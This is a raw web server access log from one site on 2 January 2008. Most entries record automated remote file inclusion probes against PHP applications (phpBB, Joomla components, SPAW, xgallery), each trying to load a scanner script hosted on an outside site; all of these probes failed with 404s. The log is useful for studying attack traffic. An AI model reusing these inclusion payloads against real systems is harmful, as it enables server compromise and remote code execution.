64.191.78.197 - - [02/Jan/2008:17:57:47 -0800] "GET /logs/access_071224.log//intern/admin/?rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:47 -0800] "GET //intern/admin/?rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:47 -0800] "GET /logs//intern/admin/?rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:53 -0800] "GET /logs/access_071224.log//intern/admin/?rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:53 -0800] "GET //intern/admin/?rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:53 -0800] "GET /logs//intern/admin/?rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:58:09 -0800] "GET //intern/admin/other/backup.php?admin=1&rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:58:54 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:58:54 -0800] "GET /displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:58:54 -0800] "GET /logs/displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:59:12 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:59:15 -0800] "GET //convert/mvcw.php?vwar_root=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.30 - - [02/Jan/2008:18:00:29 -0800] "GET /logs/access_071202.log HTTP/1.0" 200 60645 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.199.29.214 - - [02/Jan/2008:18:05:20 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "CFNetwork/220" "www.dmulk.com"
74.6.23.22 - - [02/Jan/2008:18:08:17 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:09:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:09:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:18:09:53 -0800] "GET /logs/access_071224.log//convert/mvcw.php?vwar_root=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:18:09:53 -0800] "GET //convert/mvcw.php?vwar_root=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:18:09:53 -0800] "GET /logs//convert/mvcw.php?vwar_root=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:18:10:42 -0800] "GET /logs/access_071221.log//convert/mvcw.php?vwar_root=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.227.90 - - [02/Jan/2008:18:38:37 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.227.90 - - [02/Jan/2008:18:38:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.227.90 - - [02/Jan/2008:18:38:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:39:29 -0800] "GET /logs/index.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:39:29 -0800] "GET /index.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:39:52 -0800] "GET /index.php?select=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:39:52 -0800] "GET /logs/index.php?select=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:41:22 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:41:22 -0800] "GET //modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.25.158 - - [02/Jan/2008:18:43:56 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.12 - - [02/Jan/2008:18:44:53 -0800] "GET /mobileoffice/?M=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:45:16 -0800] "GET /logs/index.php?select=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:45:16 -0800] "GET /index.php?select=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:46:29 -0800] "GET /logs/index2.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:46:29 -0800] "GET /index2.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:47:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:47:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:49:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:49:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:51:03 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:51:03 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
130.94.69.17 - - [02/Jan/2008:18:52:33 -0800] "GET /logs/access_071214.log//spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [02/Jan/2008:18:52:34 -0800] "GET //spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [02/Jan/2008:18:52:34 -0800] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [02/Jan/2008:18:52:54 -0800] "GET /logs/access_071218.log//spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:53:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:18:53:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:57:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:18:57:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
213.214.30.129 - - [02/Jan/2008:19:00:26 -0800] "GET /logs/access_071220.log//spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.214.30.129 - - [02/Jan/2008:19:00:26 -0800] "GET //spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.214.30.129 - - [02/Jan/2008:19:00:26 -0800] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:02:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:02:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
213.214.30.129 - - [02/Jan/2008:19:03:15 -0800] "GET /logs/access_071214.log//spaw/dialogs/img_library.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.22.82 - - [02/Jan/2008:19:04:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.82 - - [02/Jan/2008:19:04:00 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.188.218.110 - - [02/Jan/2008:19:12:40 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [02/Jan/2008:19:12:41 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [02/Jan/2008:19:12:41 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:14:34 -0800] "GET /comments-display-tpl.php?config[comments_form_tpl]=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:14:34 -0800] "GET /logs/comments-display-tpl.php?config[comments_form_tpl]=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.200.79.215 - - [02/Jan/2008:19:15:22 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [02/Jan/2008:19:15:22 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [02/Jan/2008:19:15:22 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:15:51 -0800] "GET /index.php?pg=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:15:51 -0800] "GET /logs/index.php?pg=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:19:15:58 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:19:15:58 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:19:15:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:16:09 -0800] "GET /logs/index.php?pg=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:16:09 -0800] "GET /index.php?pg=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:18:32 -0800] "GET /contact.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:18:32 -0800] "GET /logs/contact.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
66.129.89.71 - - [02/Jan/2008:19:19:57 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [02/Jan/2008:19:19:57 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [02/Jan/2008:19:19:57 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.187.66.133 - - [02/Jan/2008:19:20:45 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [02/Jan/2008:19:20:46 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [02/Jan/2008:19:20:46 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.227.90 - - [02/Jan/2008:19:22:07 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.227.90 - - [02/Jan/2008:19:22:07 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.227.90 - - [02/Jan/2008:19:22:07 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:23:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:24:09 -0800] "GET /about.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:19:24:09 -0800] "GET /logs/about.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:19:24:45 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:19:24:46 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:19:24:46 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.84.55 - - [02/Jan/2008:19:25:43 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.84.55 - - [02/Jan/2008:19:25:43 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.84.55 - - [02/Jan/2008:19:25:43 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:28:08 -0800] "GET /menu.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:28:08 -0800] "GET /logs/menu.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.29.32 - - [02/Jan/2008:19:34:41 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:35:29 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:35:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:35:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:35:50 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:38:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:40:06 -0800] "GET /file.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:40:06 -0800] "GET /logs/file.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
65.214.45.100 - - [02/Jan/2008:19:42:53 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
